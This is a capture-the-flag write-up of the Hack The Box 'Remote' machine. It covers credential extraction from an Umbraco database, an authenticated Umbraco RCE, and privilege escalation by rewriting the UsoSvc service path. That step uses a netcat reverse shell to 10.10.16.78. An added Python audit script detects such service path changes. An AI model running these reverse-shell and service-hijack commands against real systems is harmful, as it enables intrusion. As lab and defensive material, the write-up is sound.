Hack The Box - Remote Writeup

System Summary


Initial Enumeration


It's a Windows box, but enum4linux and smbclient don't show any valuable content without authentication.

Nmap shows a couple of extra services that look interesting (FTP and NFS).

The main webpage shows

In the "People" page there are 5 employees whose names might be used for some brute-forcing.

But let's first see if we can do something with FTP or NFS.

FTP accepts anonymous access, but with no upload:

Let's see the NFS shares list:

And let's try to mount them


But unfortunately we have no write access to it.
Looking around, there is a file "Umbraco.sdf" in the "App_Data" folder that has some interesting strings in it:


We have some hashes


And we also know that there is a user ssmith, who does not appear on the employees page.
But we can infer that the username scheme is probably first-name initial + last name.

The first hash (SHA1) is easily cracked and reveals a possible password: baconandcheese


Initial Foothold and User Flag



So the next step is to try to use this information to get some kind of access.
It turns out that the Umbraco CMS running the website can be accessed with these credentials:

  • Username: admin@htb.local
  • Password: baconandcheese


The Umbraco version is 7.12.4, which is vulnerable to an RCE for authenticated users: https://www.exploit-db.com/exploits/46153
So we can execute arbitrary commands:


And use that to get better access.
I chose to use mshta with Metasploit to make it easy, and got a shell:

Root Flag


Uploading netcat and winPEAS, we discover that we can modify the service UsoSvc and start it:


So the trick should be this:

  • Upload nc.exe somewhere (e.g. c:\tmp)
  • Reconfigure the UsoSvc service using the command
    • sc.exe config usosvc binPath="c:\tmp\nc.exe 10.10.16.78 5555 -e c:\windows\system32\cmd.exe"
  • Start the UsoSvc service
    • sc.exe start usosvc
  • Wait for the shell to connect back
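From the defender's side, the step that gives this away is the service binary path being rewritten to a binary outside the usual system directories (and, here, one that carries a command-shell token). The script below is an added example, not part of the original writeup: it runs a small audit over constructed log lines modelled loosely on Sysmon Event ID 13 (registry value set) for `...\Services\<name>\ImagePath`, and flags any service whose new image path lands outside a trusted directory or contains a shell-like token. The flattened `key=value|key=value` line format, the `TRUSTED_DIRS` and `SHELL_MARKERS` lists, and all sample records are assumptions made for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample records, modelled loosely on Sysmon Event ID 13
# (RegistryEvent, value set) flattened to "key=value|key=value".
# These are illustrative and were not captured from the box.
SAMPLE_EVENTS = [
    "EventID=13|Image=C:\\Windows\\system32\\services.exe|"
    "TargetObject=HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\ImagePath|"
    "Details=C:\\Windows\\system32\\svchost.exe -k netsvcs -p",
    "EventID=13|Image=C:\\Windows\\system32\\services.exe|"
    "TargetObject=HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\ImagePath|"
    "Details=c:\\tmp\\nc.exe 10.10.16.78 5555 -e c:\\windows\\system32\\cmd.exe",
    "EventID=13|Image=C:\\Windows\\system32\\services.exe|"
    "TargetObject=HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath|"
    "Details=C:\\Windows\\System32\\spoolsv.exe",
    "EventID=13|Image=C:\\Windows\\system32\\services.exe|"
    "TargetObject=HKLM\\System\\CurrentControlSet\\Services\\BackupAgent\\ImagePath|"
    "Details=C:\\Users\\Public\\agent.exe --listen",
    # Unrelated registry event: must be ignored by the audit.
    "EventID=12|Image=C:\\Windows\\regedit.exe|"
    "TargetObject=HKLM\\Software\\Example|Details=",
]

# Directories a service binary is normally expected to live in (assumption;
# tune to the environment). Compared case-insensitively.
TRUSTED_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Tokens that rarely belong in a legitimate service image path (assumption).
SHELL_MARKERS = ("cmd.exe", "powershell", " -e ", "nc.exe", "mshta")

# Matches the ImagePath value of any service key.
SERVICE_KEY = re.compile(r"\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split a flattened 'key=value|key=value' record into a dict."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def check_image_path(image_path: str) -> List[str]:
    """Return the reasons an image path looks suspicious (empty if clean)."""
    reasons: List[str] = []
    # Normalise: drop surrounding quotes and compare case-insensitively.
    path = image_path.strip().strip('"').lower()
    if not path.startswith(TRUSTED_DIRS):
        reasons.append("binary outside trusted directories")
    for marker in SHELL_MARKERS:
        if marker in path:
            reasons.append(f"suspicious token {marker!r}")
    return reasons


def audit_events(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (service, new_image_path, reasons) for every flagged change."""
    findings: List[Tuple[str, str, List[str]]] = []
    for line in lines:
        event = parse_event(line)
        if event.get("EventID") != "13":
            continue
        match = SERVICE_KEY.search(event.get("TargetObject", ""))
        if not match:
            continue
        new_path = event.get("Details", "")
        reasons = check_image_path(new_path)
        if reasons:
            findings.append((match.group(1), new_path, reasons))
    return findings


if __name__ == "__main__":
    for service, path, reasons in audit_events(SAMPLE_EVENTS):
        print(f"[!] {service}: {path}")
        for reason in reasons:
            print(f"    - {reason}")
```

On the sample records the audit flags the rewritten UsoSvc path (untrusted directory plus three shell-like tokens) and the BackupAgent path (untrusted directory only), while the normal UsoSvc and Spooler entries pass. The same check could be fed from a scheduled export of `HKLM\System\CurrentControlSet\Services` instead of Sysmon events; either way the signal is a service image path that moved out of the trusted set, which is exactly what the `sc.exe config ... binPath=` step above does.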


We got the shell back and quickly went to c:\users\administrator\Desktop to get the flag.

Quickly, because the shell only stays alive until someone else reconfigures the service and starts it again.
On the free servers this can happen very frequently.
